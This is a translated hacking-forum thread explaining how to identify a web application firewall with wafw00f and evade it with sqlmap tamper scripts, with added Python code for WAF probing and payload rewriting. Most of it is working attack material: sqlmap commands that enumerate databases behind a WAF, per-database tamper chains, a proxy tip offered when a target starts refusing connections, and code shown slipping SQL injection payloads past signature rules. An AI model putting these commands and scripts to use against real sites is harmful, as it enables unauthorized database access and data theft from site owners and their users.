What is WAF And How Can We Bypass It With SQLMap Functions

Elflatus
New member
6 May 2019


What Is a WAF? How Can We Bypass It?


Hello, dear members of the Turk Hack Team. In this article we will learn how to bypass a WAF by using the --tamper option of SQLMap.

First, what is a WAF?






A Web Application Firewall (WAF), or web firewall for short, sits between the client and the web application and inspects HTTP traffic. It flags traffic that looks abnormal, performs detailed inspection of each request and blocks the malicious requests an attacker sends, typically by matching the request against signatures of known attacks such as SQL injection. Note what that means: the WAF does not fix the injection flaw in the application, it only refuses requests whose payloads it recognises. So how do we get past it? With SQLMap, by rewriting the payloads so that they still work on the database but no longer match the WAF's signatures.

How Do We Detect a WAF on a Website?

Opening a terminal and running wafw00f against the target is usually enough:

Code:
wafw00f http://website.com



In this case wafw00f reports that the target website is protected by the ModSecurity (SpiderLabs) WAF.


What Does the --tamper Option Do?

Say you have found a website and tried to enumerate its databases with sqlmap -u targetwebsite.com --dbs, then noticed that the site is behind a WAF and sqlmap could not retrieve anything because the WAF dropped its requests. First identify the WAF (with wafw00f, as above) and the database backend the application uses (MySQL, Microsoft SQL Server, PostgreSQL and so on; sqlmap prints this when it fingerprints the target). Both matter: the WAF decides what gets filtered, and the backend decides which rewritten syntax is still valid SQL, because most bypass scripts produce comment or operator tricks that only one family of databases accepts. Then choose the bypass accordingly. There are many bypass scripts in the tamper folder inside the SQLMap folder.





Each of them does something different, so we cannot pick them at random. Open a script and read the docstring at the top of the file: it states what the script rewrites and which database (MySQL, MSSQL and so on) it is meant for.


Usage of the --tamper Option

Once we have found the bypass script we want to use, the usage is simple: add --tamper="bypass script name" to the end of the command line. Several scripts can be chained with commas, for example --tamper=space2comment,randomcase, and sqlmap will run all of them over every payload it sends. Quote the URL so the shell does not interpret the ? and & characters in it.
Code:
sqlmap -u "www.website.com/page.php?id=7" --tamper "escapequotes" --dbs
That is the whole trick: every payload sqlmap generates passes through the chosen script before it is sent, so the WAF sees a form it does not recognise while the database still executes it. If sqlmap still reports the parameter as not injectable, try a different script that fits the detected WAF and backend rather than piling scripts on blindly. Thanks for reading.

Source: Waf Nedir ve SQLMap Fonksiyonlarıyla Nasıl Atlatılır? (What is a WAF and how is it bypassed with SQLMap functions?)


Translator: Elflatus
 
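As an added example (my own code, not part of the original post and not wafw00f's source), here is the kind of check wafw00f automates: request the page with a harmless parameter value, request it again with an obviously malicious probe in the same parameter, and look for the differences a filtering device introduces (a block status code, a changed Server header, a block page in the body). The sample responses at the bottom are constructed to resemble an Apache server with ModSecurity answering 403; the body marker list and the URL handling are my assumptions, not a wafw00f signature database.

```python
"""
A minimal WAF presence check, modelled on what wafw00f automates.

fetch() is the only function that touches the network; compare() works on
plain Response objects, so the detection logic can be run offline against
the constructed SAMPLE_* responses at the bottom.
"""
from dataclasses import dataclass
import urllib.error
import urllib.parse
import urllib.request

# A textbook SQL injection string that no legitimate page parameter needs.
PROBE = "' UNION SELECT 1,2,3-- -"

# Status codes filtering devices commonly answer with instead of the page.
BLOCK_STATUSES = {403, 406, 418, 419, 429, 503}

# Illustrative block-page markers (constructed list; real WAF pages vary).
BODY_MARKERS = ("mod_security", "modsecurity", "request blocked", "access denied")


@dataclass
class Response:
    status: int
    headers: dict  # header name (lower-cased) -> value
    body: str


def fetch(url, param, value, timeout=10.0):
    """GET url with ?param=value added, returning a Response even on 4xx/5xx."""
    parts = urllib.parse.urlsplit(url)
    if not parts.scheme:
        raise ValueError("url must include http:// or https://")
    query = dict(urllib.parse.parse_qsl(parts.query))
    query[param] = value
    target = urllib.parse.urlunsplit(parts._replace(query=urllib.parse.urlencode(query)))
    req = urllib.request.Request(target, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return Response(resp.status, {k.lower(): v for k, v in resp.headers.items()},
                            resp.read(65536).decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:  # 4xx/5xx still carry headers and a body
        return Response(err.code, {k.lower(): v for k, v in err.headers.items()},
                        err.read(65536).decode("utf-8", "replace"))


def compare(baseline, probe):
    """Return the pieces of evidence that something filtered the probe request."""
    evidence = []
    if probe.status != baseline.status and probe.status in BLOCK_STATUSES:
        evidence.append("status changed %d -> %d" % (baseline.status, probe.status))
    for name in ("server", "via", "x-powered-by"):  # a device in front often rewrites these
        if baseline.headers.get(name) != probe.headers.get(name):
            evidence.append("header %s changed: %r -> %r"
                            % (name, baseline.headers.get(name), probe.headers.get(name)))
    body = probe.body.lower()
    for marker in BODY_MARKERS:
        if marker in body and marker not in baseline.body.lower():
            evidence.append("body mentions %r" % marker)
    return evidence


def looks_filtered(baseline, probe):
    """True if the probe request was treated differently from the benign one."""
    return bool(compare(baseline, probe))


def check(url, param, benign_value="1"):
    """Live check: compare a benign value with the same value plus the probe."""
    return compare(fetch(url, param, benign_value), fetch(url, param, benign_value + PROBE))


# Constructed responses standing in for a site behind ModSecurity on Apache.
SAMPLE_BASELINE = Response(200, {"server": "Apache", "content-type": "text/html"},
                           "<html><body>Product 1</body></html>")
SAMPLE_PROBE = Response(403, {"server": "Apache", "content-type": "text/html"},
                        "<html><body><h1>Forbidden</h1>"
                        "This error was generated by Mod_Security.</body></html>")

if __name__ == "__main__":
    for line in compare(SAMPLE_BASELINE, SAMPLE_PROBE):
        print(line)
```

A positive result here means something in the path treats attack-shaped input differently; it does not name the product, which is what wafw00f's signature set adds. The reverse is not safe either: a WAF can answer the probe with a normal-looking 200 page, so an empty evidence list is not proof that no WAF is present.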

Kasem
Member
Hello, first of all thanks, but let me ask this: once we have detected the kind of WAF, how are we going to know which tamper is best for that specific WAF? Is the tamper named the same as the WAF?
 

Elflatus
New member

As I said in the article, they each have their own purpose. We can group them under headings, and we can use many of them in one line.



General scripts:
--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes


Microsoft Access:
--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords


Microsoft SQL Server:
--tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes


MySQL:
--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor


Oracle:
--tamper=between,charencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes,xforwardedfor


PostgreSQL:
--tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,xforwardedfor


SAP MaxDB:
--tamper=ifnull2ifisnull,nonrecursivereplacement,randomcase,securesphere,space2comment,space2plus,unionalltounion,unmagicquotes,xforwardedfor


SQLite:
--tamper=ifnull2ifisnull,multiplespaces,nonrecursivereplacement,randomcase,securesphere,space2comment,space2dash,space2plus,unionalltounion,unmagicquotes,xforwardedfor






 
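To make concrete what the article's --tamper section and the per-database lists in the reply above are about, here is an added example (my own code, not sqlmap's and not from the original thread). sqlmap loads every script named in --tamper=a,b,c as a Python module that exposes tamper(payload, **kwargs) and a __priority__, and runs all of them over every payload it sends, highest priority first. The four functions below are simplified re-implementations of four stock scripts that appear in the lists (space2comment, space2hash, space2dash, between), and NAIVE_WAF is a constructed rule set standing in for a signature-matching WAF; neither reproduces sqlmap's or any vendor's real code. The point the per-database lists make shows up directly: space2hash relies on # being a comment marker, which only MySQL honours, and space2dash relies on --junk being a comment, which MySQL rejects because it requires whitespace after --.

```python
"""
What --tamper actually does: sqlmap-style tamper scripts and chaining.

Each tamper(payload, **kwargs) rewrites one payload; apply_chain() orders a
list of them the way sqlmap orders --tamper=a,b,c. NAIVE_WAF is a constructed
signature rule set used only to show which rewrites slip past which rules.
"""
import random
import re
import string

# Two of sqlmap's priority levels; only their relative order matters here.
PRIORITY_HIGHEST, PRIORITY_LOW = 100, -10


def space2comment(payload, **kwargs):
    """'UNION SELECT' -> 'UNION/**/SELECT'. An inline comment counts as
    whitespace in every major SQL dialect, so this is safe on any backend."""
    return payload.replace(" ", "/**/") if payload else payload


def _junk(rng, n=8):
    """Random letters, so the comment body differs on every request."""
    return "".join(rng.choice(string.ascii_letters) for _ in range(n))


def space2hash(payload, rng=random, **kwargs):
    """Space -> '#<junk>\\n', URL-encoded as %23...%0A because the payload
    travels in the query string. '#' opens a comment only in MySQL; on MSSQL,
    PostgreSQL or Oracle the result is a syntax error, so this is MySQL-only."""
    return re.sub(" ", lambda m: "%%23%s%%0A" % _junk(rng), payload) if payload else payload


def space2dash(payload, rng=random, **kwargs):
    """Space -> '--<junk>\\n'. MSSQL and SQLite accept '--junk' as a comment;
    MySQL requires whitespace after '--', so the same payload breaks there."""
    return re.sub(" ", lambda m: "--%s%%0A" % _junk(rng), payload) if payload else payload


def between(payload, **kwargs):
    """Remove the '>' and '=' characters many rules key on:
    'a > b' -> 'a NOT BETWEEN 0 AND b', 'a = b' -> 'a BETWEEN b AND b'."""
    if not payload:
        return payload
    out = re.sub(r"\s*>\s*(\w+)", r" NOT BETWEEN 0 AND \1", payload)
    if out == payload:
        out = re.sub(r"(\w+)\s*=\s*(\w+)", r"\1 BETWEEN \2 AND \2", payload)
    return out


# Structural rewrites run first, spacing/encoding rewrites last (sqlmap's own
# between.py is PRIORITY.HIGHEST, the space2* scripts PRIORITY.LOW).
PRIORITY = {between: PRIORITY_HIGHEST, space2comment: PRIORITY_LOW,
            space2hash: PRIORITY_LOW, space2dash: PRIORITY_LOW}


def apply_chain(payload, scripts, **kwargs):
    """--tamper=a,b,c: every script rewrites the payload, highest priority first."""
    for script in sorted(scripts, key=lambda s: PRIORITY.get(s, 0), reverse=True):
        payload = script(payload, **kwargs)
    return payload


# Constructed rules for a naive signature-matching WAF (illustration only).
NAIVE_WAF = [
    re.compile(r"(?i)union\s+select"),           # classic UNION probe
    re.compile(r"(?i)\b(and|or)\s+\w+\s*[=>]"),  # 'AND 1=1', 'OR 2>1'
]


def waf_blocks(payload):
    """True if the constructed WAF would refuse this payload."""
    return any(rule.search(payload) for rule in NAIVE_WAF)


def demo():
    """Run a few payloads through the rule set with and without tampering."""
    rng = random.Random(7)  # fixed seed so the junk strings are repeatable
    results = {}
    for name, payload, scripts in [
        ("union plain", "1 UNION SELECT 1,2,3", []),
        ("union space2comment", "1 UNION SELECT 1,2,3", [space2comment]),
        ("union space2hash (MySQL only)", "1 UNION SELECT 1,2,3", [space2hash]),
        ("bool plain", "1 AND 1=1", []),
        ("bool between", "1 AND 1=1", [between]),
        ("bool between+space2comment", "1 AND 1=1", [space2comment, between]),
    ]:
        out = apply_chain(payload, scripts, rng=rng)
        results[name] = (out, waf_blocks(out))
    return results


if __name__ == "__main__":
    for name, (out, blocked) in demo().items():
        print("%-32s %-8s %s" % (name, "BLOCKED" if blocked else "passes", out))
```

Running demo() shows the two plain payloads blocked and every tampered variant passing the constructed rules, which is the whole mechanism behind --tamper: the rule keys on a literal space or an = sign, the script removes it, the database still parses the result. It also shows why the lists above are per database: the space2hash output passes the WAF on any backend, but only MySQL will execute it.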

Kasem
Member
Thank you. Can you also tell me how to use a proxy? When I target the URL, after a while it says connection refused.
 

Elflatus
New member
Thank you, cab you also tell me how to use proxy too when I target the url after a while it says connection refused.
You can use a proxy with the --proxy parameter. Your proxy must be an HTTP proxy. Then just add --proxy.
Code:
sqlmap -u "www.website.com/page.php?id=7" --proxy=http://127.0.0.1:8080 --tamper "tamperscript" --dbs   # 8080 is an assumed port: sqlmap needs address:port, so use the port your proxy listens on
 

M3m0ry
Senior member
Congratulations. Legendary topic.
 

Kasem
Member
I really appreciate it. Hopefully in your next article you will talk about the level, risk and random-agent parameters. Well done 👏
 